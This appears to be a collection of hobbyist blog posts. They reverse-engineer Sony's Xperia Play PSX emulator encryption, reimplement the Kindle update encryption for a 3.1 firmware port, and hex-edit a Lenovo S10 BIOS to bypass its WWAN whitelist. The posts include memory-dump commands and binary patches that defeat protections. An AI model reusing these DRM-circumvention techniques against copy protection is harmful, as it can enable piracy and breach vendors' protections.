When the game didn’t boot and was frozen on screen, I knew it had to be another obstacle. Our code had to have worked because otherwise, it would have crashed. Debugging with GDB, it seems like the program is blocking forever, seemingly on purpose. To double check, I loaded Crash Bandicoot again, but with my patched emulator and it worked. So, I guess there was a check somewhere that only loads Crash Bandicoot. Yes, I could go back into IDA and look for where the check is and NOP it out, but I was tired by then and my short attention span wanted me to work on something else, so I took the easy way out and patched the PSX image with the titleid for Crash Bandicoot. As far as I know, this shouldn’t affect anything in terms of compatibility, but further tests are needed.

Next week on “cracking the emulator”…

Version 3 of the emulator is already out and is distributed in the PS-Suite games in the Japanese PSN store (on the Play). I already took a look at it, and the emulator did not seem to be updated, so I didn’t try hard to patch it. However, it seems that they implemented many new security mechanisms in the PS-Suite PSX games. For starters, there is a public-private key exchange to make sure all the files in the APK are untouched, and I’m pretty sure the PS-Image is now encrypted or the format has changed. Now, Sony did not do all this to prevent us from loading our own games (or maybe they did). I suspect it’s to prevent pirates from stealing the PSN games. Which means that if I crack the version 3 emulator, I may be helping piracy. This means, I will most likely not touch the PS-Suite emulators, and if I do, two things have to happen. 1) I need to be sure that the emulator has much better compatibility, and 2) I need a way to make sure that my tool isn’t going to be used for piracy. So I guess this may be the last release for a while.


Project Page

Reverse engineering a dynamic library on the Xperia Play

Welcome to part two of my journey to completely reverse the PSX emulator on the Xperia Play. When we last left off, I managed to figure out the format and the basic order of execution of the emulator. It’s been a week now, and I have more stuff to reveal.

Decrypting the data

One of the main problems was that most of the important files are encrypted. More specifically, these three files: ps1_rom.bin (BIOS), (the emulator), and image_ps_toc (then unknown data). As I mentioned before, Sony used what’s called white box cryptography, which means obfuscating the code to hide the decryption keys. But, we don’t need the keys, we just need the decrypted data. The obvious way of extracting the decrypted data is dumping it from the RAM. However, the Android kernel I’m using doesn’t support reading /dev/kmem and I don’t want to mess with recompiling the kernel. I’ve also tried dumping with GDB, and it did work, but the data isn’t complete and is messy. I used a more unorthodox method of obtaining the decrypted data. After hours of reading and mapping in IDA Pro, I figured out that everything that is decrypted goes through one public function, uncompress(), a part of zlib. This is important, because this means everything that is decrypted is sent to zlib and zlib is open source. That means, I just need to recompile zlib with some extra code in uncompress() that will dump the input and output data. A simple fwrite() will do, as the data is already in a clean, memcpy-able form. (I forgot about LD_PRELOAD at the time, but that might have worked easier). After some trouble getting NDK to compile zlib, I have dumps of both the compressed/decrypted and uncompressed forms of all encrypted content.

Analyzing the dumps

The next thing is to find out the meaning of the data that we worked so hard to get. ps1_rom.bin is easy. Surprisingly, it is NOT a PS1 BIOS file, but actually part of a PS2 BIOS dump (part, being only the PS1 part of the PS2 BIOS). Does this mean a PS2 emulator is coming for the Play? I don’t know. Next, we have Plugging it into IDA Pro reveals the juicy details of the PS1 emulator. It’s really nothing interesting, but if we ever want multi-disk support or decrypting the manuals, this would be the place to look. Finally, we have image_ps_toc (as it is called in the symbols file). I am actually embarrassed to say it took almost a day for me to figure out that it’s a table of contents file. I did guess so at first, but I couldn’t see a pattern, but after a night’s sleep, I figured out the format of the uncompressed image_ps_toc file. (Offsets are in hex, data are little-endian)

0x4 byte header

0x4 byte uncompressed image size

0x12 byte constant (I’m guessing it may have something to do with number of disks and where to cut off)

0x4 byte number of entries

Each entry:

0x4 byte offset in, where the compressed image is split format

I actually forgot to mention this in my last post. The “rom” that is loaded by the emulator is a file named It is found on the SD card inside the ZPAK. It is unencrypted, and if you delete it, it will be downloaded again from Sony’s servers unencrypted. How it works is that a PSX ISO is taken and split into 0x9300 (about 38kb) sections, and each section is compressed using deflate (zlib again) and placed inside (with a 0x14 byte header). The offsets of each section are stored in the toc file (and encrypted) because although uncompressed, they’re perfect 38kb sections, compressed, they’re variable sized. I already wrote a tool to convert to an ISO and back again.
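
To make the two formats concrete, here is a minimal Python sketch. It assumes the TOC fields are packed back to back in the order listed above, that each section is a standalone zlib stream, and that offsets are relative to the start of the compressed data. The 0x14 byte header is left out because its contents are not described here. All function names are made up for illustration.

```python
import struct
import zlib

SECTION_SIZE = 0x9300  # size of each uncompressed section


def parse_toc(toc: bytes):
    """Return (uncompressed_size, [section offsets]) from a decrypted TOC."""
    (image_size,) = struct.unpack_from("<I", toc, 0x4)    # after 0x4 byte header
    (count,) = struct.unpack_from("<I", toc, 0x1A)        # after 0x12 byte constant
    offsets = list(struct.unpack_from("<%dI" % count, toc, 0x1E))
    return image_size, offsets


def compress_sections(iso: bytes):
    """Split an image into sections and compress each one separately."""
    blob = bytearray()
    offsets = []
    for start in range(0, len(iso), SECTION_SIZE):
        offsets.append(len(blob))                         # where this section starts
        blob += zlib.compress(iso[start:start + SECTION_SIZE])
    return bytes(blob), offsets


def decompress_sections(blob: bytes, offsets):
    """Rebuild the image by decompressing each section between two offsets."""
    out = bytearray()
    ends = list(offsets[1:]) + [len(blob)]
    for start, end in zip(offsets, ends):
        out += zlib.decompress(blob[start:end])
    return bytes(out)
```

This also shows why the offsets have to be stored at all: the sections are a fixed size before compression, but each compressed section has a different length.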

Putting it all back together

Now that we’ve torn apart, analyzed, and understood every element of the PSX emulator on the Xperia Play, what do we do? The ultimate goal is to convert any PSX game to run on the Xperia Play, but how do we do that? There are two main challenges. First of all,, which loads everything, expects data to be encrypted. Once again, we need keys. Also, I’m pretty sure it uses a custom encryption technique called “TFIT AES Cipher”, because I was not able to find information on it anywhere else. However, since we have the decrypted files, we can patch the library to load the decrypted files directly from memory, and I was halfway into doing that when I realized two more problems. Secondly, if I were to patch the library to load decrypted data, that means every user needs to decrypt the files themselves (because I won’t distribute copyrighted code). Third, image_ps_toc is variable sized, which means if the image is too big, it’ll break the offsets and refuse to load.

Currently, I’m trying to find the easiest and most legal way of allowing custom image_ps_toc files to work. (Bonus points if I can also load custom BIOS files). What I hope for is to write a wrapper library,, which loads and patches GetImageTOC and GetImageTOCLength to load from a file instead of memory. This means I have to deal with Java and JNI again (ugh), and also do some weird stuff with pointers and memcpy (double ugh). The JNI methods in the library do not have their symbols exported, so I have to find a way of manually loading them.

Bonus: blind patching a binary

When trying to patch a method for an ARM processor, it’s a bit of a pain and I’m too lazy to read about proper GDB debugging techniques. In addition, Sony wasn’t kind enough to compile everything with debugging symbols. However, I came up with a hacky-slashy way of changing instructions and seeing what happens. First, open up IDA Pro and find the function you want to modify. For example, I want decrypt_executable() to bypass decryption and just copy data plain. Find the instruction to change, and the opcode to change it to. For example, I want to change a BL instruction to NOP and CMP to CMN (don’t jump to decryption process and negate the “return == 0”). I have ARM’s NOP memorized by now: 00 00 A0 E1. I don’t know what CMN’s opcode is, but if I look around I can find CMN somewhere and I see it’s just a change from a 5 to a 7. After everything’s done, copy it over to the phone and run it. If it crashes (and it should), look at the dump. The only important part is the beginning:

I/DEBUG   (  105): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 00000054
I/DEBUG   (  105):  r0 002d9508  r1 413c103c  r2 2afcc8d0  r3 002d93d8
I/DEBUG   (  105):  r4 00000004  r5 002d93e0  r6 6ca9dd68  r7 00000000
I/DEBUG   (  105):  r8 7e9dd478  r9 2cbffc70  10 0000aca0  fp 6caa4d48
I/DEBUG   (  105):  ip 002d93e8  sp 7e9dd0c0  lr 00000001  pc 4112d01c  cpsr 40000010

The error message (“SIGSEGV”) doesn’t help at all, but we have a dump of all the registers in the CPU. The important one is the PC (program counter), which shows that the last instruction executed was at address 0x4112d01c in memory. To get the program offset, just cat /proc/{pid}/maps to find where is loaded in memory. Subtract the offsets, and pop it into IDA Pro. Now figure out why it crashed and try again. I need to learn proper debugging techniques one day.
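
The subtraction can be scripted so it is harder to get wrong. The Python sketch below takes the text of /proc/{pid}/maps and a PC value and returns the mapped file together with the offset inside it. The function name is made up for illustration, and it assumes the usual Linux maps layout (address range, permissions, file offset, device, inode, path).

```python
def library_offset(maps_text: str, pc: int):
    """Return (path, offset in file) for the mapping that contains pc, or None."""
    for line in maps_text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue                              # not a mapping line
        start_text, end_text = parts[0].split("-")
        start, end = int(start_text, 16), int(end_text, 16)
        if start <= pc < end:
            file_offset = int(parts[2], 16)       # offset of the mapping in the file
            path = parts[5] if len(parts) > 5 else ""
            return path, pc - start + file_offset
    return None
```

If the library is loaded in IDA Pro at base 0, the returned offset is usually the address to jump to; with a different image base, add that base first.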

Analyzing the PSX emulator on the Xperia Play

I’ve been playing around with the new Xperia Play (well, with the speed of these Android phone releases, it’s already old). I’ve decided it would be a challenge to try to figure out how the PSOne emulator works and eventually be able to inject any ISO and play it with Sony’s superior PS1 emulator. Just to be clear, nothing is done yet, and this is just a technical post to aid whoever else is trying to do the same thing. Also, because information should be free.

Decompiling and disassembling

Before we can do any analyzing, we need to break everything open. I found a couple of useful tools to aid with reverse engineering Android applications. First up is apktool, which is like an all-in-one Android app decompression and decompilation tool. It uses various other tools to do stuff like decompress resources, convert the meta files to be readable, and use baksmali to disassemble Dalvik bytecode to assembly code. Another useful tool is dex2jar, which converts Dalvik bytecode to regular Java bytecode and generates a jar that can be decompiled to Java code using a decompiler like, my favorite, JD-GUI. Last, but not least, we have the big guns: IDA Pro, which I’ve used religiously for many projects. If you don’t know, it can disassemble almost any binary, including native ARM libraries.

Stepping through

The first thing to do once we have disassembled all the code is to read it. A good way to start is to follow the application from start to finish through the code. Looking in the Android manifest file, we find the main activity that is started is We open that up, look at onCreate() and read what it does, follow whatever methods it calls and read through all those too. It may get a bit complicated, so I suggest thinking like a stack. From what I can understand, the first thing the app does is check if the data is downloaded. “Crash Bandicoot” is a 500MB game and would use up all the system space, so what Sony did is pack the binaries into the APK installed on the system, while the game data (textures, images, etc) is a ZPAK (renamed PKZIP) file that is downloaded from their servers if deleted. Once the data is verified to exist or has been downloaded from Sony’s servers, the baton is passed to a native JNI library to do the actual work.

Native code

Sony sees the Xperia Play not as just an Android phone, but a game platform. They call it “zplatform”, or as I guess: Zeus Platform (Zeus was the codename for the Xperia Play). The platform APIs are found on, which is linked by all platform compliant (read: only on Play) games. It contains functions for extracting/creating ZPAK files as well as a lot of encryption/decryption commands and other stuff like networking. Another library is, which contains the actual emulator. Well, sort of. contains almost 2MB worth of crypto-security functions. Its sole purpose is to decrypt and load into memory three files (two of which are stored encrypted inside They are: image_ps_toc (I can only guess it relates to the ROM file,, ps1_rom.bin (the PS1 BIOS, found in the data ZPAK), and (the main executable, aka: the emulator).

ZPAK files

The ZPAK file is basically a ZIP file that stores the game data. I only looked through “Bruce Lee” and “Crash Bandicoot”, but from what I can see there, all ZPAK files contain a metadata XML and one or more encrypted data files. For example, Crash Bandicoot’s ZPAK data contains, which I can guess from the size, is the ROM file for the game. I do not know if it’s an ISO or if it’s compressed, but that’s not important right now. There’s also ps1_rom.bin, which I can say for certain after reading the code to decrypt it, is the PS1 BIOS file, compressed using zlib. There are also pages from the manual, which are named after their page number and have no extensions. I assume that they’re encrypted too, because they contain no image header and the first two bytes are not the same throughout. The main thing I need to figure out is if the encryption key is common or not.
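Since a ZPAK is described above as a renamed PKZIP archive, Python's standard zipfile module should be able to open one directly. Here is a rough sketch that lists each member with its size and first four bytes, which is a quick way to check whether the files share a common header. The demo archive is built in memory as a stand-in; "metadata.xml" and the byte values are placeholders, not taken from a real ZPAK.

```python
import io
import zipfile


def list_zpak(source):
    """Return (name, size, first 4 bytes) for every member of a ZPAK/ZIP archive."""
    entries = []
    with zipfile.ZipFile(source) as archive:
        for info in archive.infolist():
            with archive.open(info) as member:
                head = member.read(4)
            entries.append((info.filename, info.file_size, head))
    return entries


# Demo on a tiny in-memory archive (a stand-in for a real ZPAK file).
demo = io.BytesIO()
with zipfile.ZipFile(demo, "w") as archive:
    archive.writestr("metadata.xml", "<?xml version='1.0'?>")  # hypothetical name
    archive.writestr("ps1_rom.bin", b"\x12\x34\x56\x78rest")   # placeholder bytes

for name, size, head in list_zpak(demo):
    print(name, size, head.hex())
```

For a real file, pass its path instead of the in-memory buffer, e.g. list_zpak("game.zpak") (file name assumed).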

The white box

The main executable,, is completely encrypted and obfuscated by, which implements white box security. If you read anything about white box cryptography (Google it), you’ll see that its sole purpose in existence is to prevent itself from being reverse engineered. It hides the decryption key in a giant table or an even bigger finite-sized key. Nevertheless, it would take someone, or a group of people, smarter than me (not that that’s hard to find) to crack this file.

What’s next

Unfortunately, that’s all I know for now. Why? Because the CDMA version of the Xperia Play has not been rooted yet, and any further analysis would require client access. I’m in the process of locating an R800i model of the Play to test with, but for now, I hope that someone who knows what they’re doing reads this and continues where I left off.

There are two giant problems preventing us from injecting any PS1 image into the emulator. First of all, everything is encrypted. My hope is that a single key used in zplatform (seeing that there are functions such as zpCryptDecrypt and zpCryptEncrypt in the platform APIs) is used by Sony to encrypt and the manuals. Second of all, we need, the emulator. This may be easier than imagined. White box cryptography is used to hide the decryption key, not the decrypted content. My hope is that is loaded into RAM after decrypts it. There is a high chance of that, because it would be hard to hide an executable and run it at the same time. If that is the case, disassembling the emulator will produce more results. If you have a rooted Xperia Play, set up USB debugging, and open up Crash Bandicoot. Connect the Play, and call “adb shell dd if=/dev/mem > memdump.bin” and then “adb shell dd if=/dev/kmem >> memdump.bin” (I don’t know which one would work, so try both). That will (hopefully) produce a memory dump that contains the emulator executable. Once we have this, even if we cannot decrypt, it may be possible to write an alternative wrapper application that will load ISOs or something.
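One possible first step with such a dump is to look for ELF headers, on the assumption (not verified here) that the decrypted emulator sits in memory as a regular ELF image. The sketch below only finds candidate offsets of the 4-byte ELF magic; a physical memory dump is not guaranteed to hold the file contiguously, so hits are starting points for manual inspection, not extracted executables.

```python
ELF_MAGIC = b"\x7fELF"


def find_elf_headers(dump):
    """Return every offset in the dump where the ELF magic bytes appear."""
    offsets = []
    pos = dump.find(ELF_MAGIC)
    while pos != -1:
        offsets.append(pos)
        pos = dump.find(ELF_MAGIC, pos + 1)
    return offsets


# Synthetic stand-in for memdump.bin: two fake headers separated by padding.
sample = b"\x00" * 16 + ELF_MAGIC + b"\x01\x01\x01" + b"\x00" * 32 + ELF_MAGIC
print([hex(offset) for offset in find_elf_headers(sample)])
```

On a real dump you would read the file in binary mode first, for example with open("memdump.bin", "rb").read(), memory permitting.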

Porting Kindle 3.1: Part 2 – Update encryption


So, on the topic of Kindle (I swear, it’s becoming an obsession). I am currently in the process of porting the Kindle 3.1 software to Kindle 2 and DX. I will make a series of posts describing my process while describing how various parts of the Kindle operating system work. Now I’ve tested 3.1 on my Kindle 2 and it works perfectly fine. All features work (audio, TTS, book reading), and the new features also work without major slowdowns (new PDF reader, new browser, etc).

Where’s part one, you ask? Well, part one was getting the 3.1 OS to work on the Kindle 2; the rest is making an easy installer. That is a long story that involves custom partition tables, manually creating tar files (checksums are a pain), remote debugging, and more. It’s a lot of stuff and most of it isn’t very useful because nobody should have to repeat the process, which is why I’m creating an easy-to-use installer. If I have time one day, I may write it down for documentation purposes.

First of all, I will write down the game plan. What I plan to do is create an installer with the least amount of steps for the user. I’m hoping for a two part or three part installer. (Can’t be one part because you need a copy of the OS, and distributing it is most likely frowned upon by Amazon). How the installer should work is:

  1. User copies an image-creator package to a jail-broken Kindle 2. This package will back up the original OS, and generate a new ext3 image with some required files from the Kindle 2 (drivers and such). It will also update the kernel to support recovery packages.
  2. User keeps the backup in a safe place, copies the image-creator package and the image generated from the K2 to a jail-broken Kindle 3, and runs the package. The image-creator will scan the filesystem, making sure all files exist and are unmodified, then copy the files to the ext3 image. It will then take the ext3 image and generate a Kindle 2 recovery package with the 3.1 OS.
  3. User copies the recovery package generated on the Kindle 3 to the Kindle 2 and restarts. The Kindle will write the ext3 image to the root partition.

Update Encryption

Now, Igor Skochinsky wrote a nice post a couple of years ago on the Kindle update encryption algorithm. Basically, to encrypt an update, you take each byte of the file and shift the bits four to the left and OR it with the same bits shifted four to the right. Then you AND the result by 0xFF and XOR it by 0x7A. (Sounds like some computer dance move). Well, Igor also wrote a nice Python script that does the encrypting and decrypting, but I didn’t want to port Python to Kindle, so I decided to modify Amazon’s update decryption script “dm” and reverse it to make an encryption script “md”. I opened up IDA Pro and looked for the encryption. Here it is, nicely commented by me in pseudocode:

BL getchar // get byte to modify
EOR R3, R0, #0x7A // R3 = R0 ^ 0x7A
CMN R0, #1 // compare R0 with -1 (EOF from getchar) …
MOV R0, R3,LSR#4 // R0 = R3 >> 4
AND R0, R0, #0xF // R0 = R0 & 0xF
ORR R0, R0, R3,LSL#4 // R0 = R0 | (R3 << 4)
BNE loc_8470 // … and if it was not EOF, branch to loc_8470 to carry on with this byte
MOV R0, #0 // otherwise (end of file) clear R0 register
ADD SP, SP, #4 // don’t care
LDMFD SP!, {PC} // don’t care

It was a simple matter of reversing the instructions and registers, but like I said before, IDA Pro does not allow changing instructions directly, so I had to mess around with the machine code in a hex editor until I made the instructions I wanted. Here’s the modified function, nicely commented by me in plain English.

BL getchar // get byte to modify
CMN R0, #1 // compare R0 with -1 (EOF from getchar) …
MOV R3, R0,LSR#4 // set R3 to R0 right shift 4
AND R3, R3, #0xF // set R3 to R3 logical AND 0xF
ORR R3, R3, R0,LSL#4 // set R3 to R3 logical OR ( R0 left shift 4 )
EOR R0, R3, #0x7A // set R0 to R3 logical exclusive OR 0x7A
BNE loc_8470 // … and if it was not EOF, branch to loc_8470 to carry on with this byte
MOV R0, #0 // otherwise (end of file) clear register R0
ADD SP, SP, #4 // don’t care
LDMFD SP!, {PC} // don’t care
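For readers who would rather not follow the assembly, the two per-byte transforms can be sketched in Python. This is my reading of the listings and of the algorithm description above, not Igor’s script and not Amazon’s code; the function names are made up for illustration.

```python
def swap_nibbles(byte):
    """Exchange the high and low 4 bits of a byte, keeping the result in 8 bits."""
    return ((byte << 4) | (byte >> 4)) & 0xFF


def md_encrypt(data):
    """Encrypt direction: swap nibbles first, then XOR with 0x7A."""
    return bytes(swap_nibbles(b) ^ 0x7A for b in data)


def dm_decrypt(data):
    """Decrypt direction: XOR with 0x7A first, then swap nibbles."""
    return bytes(swap_nibbles(b ^ 0x7A) for b in data)


message = b"hello world\n"
encrypted = md_encrypt(message)
print(encrypted.hex())
print(dm_decrypt(encrypted))
```

Because the nibble swap and the XOR are each their own inverse, decryption is simply the same two steps applied in the opposite order, which is why reversing the instructions in “dm” is enough to produce “md”.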

If you want to try it out, here’s the bspatch from “dm” to “md”. MD5 of dm is 6725ac822654b97355facd138f86d438 and after patching, md should be 3b650bcf4021b41d70796d93e1aad658. You can copy md to your Kindle’s /usr/sbin and test it out:

echo 'hello world' | md > hello.bin # "md" encrypts 'hello world' and writes it to hello.bin
cat hello.bin | dm # "dm" decrypts hello.bin and should output 'hello world'

Now that we can create update packages from the Kindle, I can start working on the Kindle 2 image-creator script.

Quickguide: Bypassing Lenovo S10 BIOS Whitelist

Lenovo loves to assert their dominance over you by whitelisting which WWAN (3G modem) cards you can install in your laptop. There has been a way to bypass or remove the whitelist on most models, except the S10. Now I found a great guide here: that shows you how to remove the whitelist, but as many found out, it doesn’t always work. The problem is that… well, I don’t know what the problem is, but I’m guessing there are additional checks. I’ve been trying to find the format of the S10 whitelist, but I’m having no luck, so we’ll do it the easy way. Brute force. Put your WWAN card into every whitelist entry. It’ll have to work then, right?

Now this is a “quickguide” which means I won’t spoon feed you. This is mostly because I don’t have the time to write a full guide, but maybe if I ever find the format of the whitelist or find a way to disable it completely, I’ll write an actual guide.

Basically, follow sbbala’s guide up until “Save and now you can close the hex-editor.” Instead of pulling out after replacing one entry, we’re going to replace a couple of others in MISER00.ROM. Take the PID/VID (little-endian reversed) and replace the following entries with it:

DB 0B 00 19 (this one was in the guide)

D1 12 01 10 (this one will appear twice, replace both)

D1 12 03 10

C6 05 01 92

D2 19 F1 FF (this one will appear twice, replace both)

Now, I’m sure there are more devices in the whitelist, but for safety reasons, the ones I chose are 1) WWAN cards (I don’t want to accidentally remove the camera from the whitelist), and 2) in the Linux VID/PID list. If this doesn’t work, then try looking for and replacing some more values in the whitelist. Although I haven’t completely reversed the whitelist format yet, I THINK it’s something like this: 1 byte FA, followed by 2 bytes (4 hex digits) of VID (little-endian), followed by 2 bytes (4 hex digits) of PID (little-endian), followed by X bytes of don’t-know-what. The offset is different for every BIOS version, but it’s always in MISER00.ROM and is before DB 0B 00 19 and a bit after a bunch of 00s.
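To work out the bytes to type into the hex editor for your own card, here is a small Python sketch. It assumes each entry is the 16-bit VID followed by the 16-bit PID, both little-endian, which is how I read the entries listed above (DB 0B 00 19 would then be VID 0x0BDB, PID 0x1900); the function names are made up for illustration.

```python
import struct


def whitelist_pattern(vid, pid):
    """Pack a USB VID and PID as two little-endian 16-bit values, VID first."""
    return struct.pack("<HH", vid, pid)


def as_hex(raw):
    """Format bytes the way a hex editor shows them, e.g. 'DB 0B 00 19'."""
    return " ".join(f"{byte:02X}" for byte in raw)


# Two of the entries listed above, rebuilt from their assumed VID/PID values.
print(as_hex(whitelist_pattern(0x0BDB, 0x1900)))
print(as_hex(whitelist_pattern(0x12D1, 0x1001)))
```

Substitute the VID and PID that lsusb (or the Windows device manager) reports for your own card to get the replacement bytes.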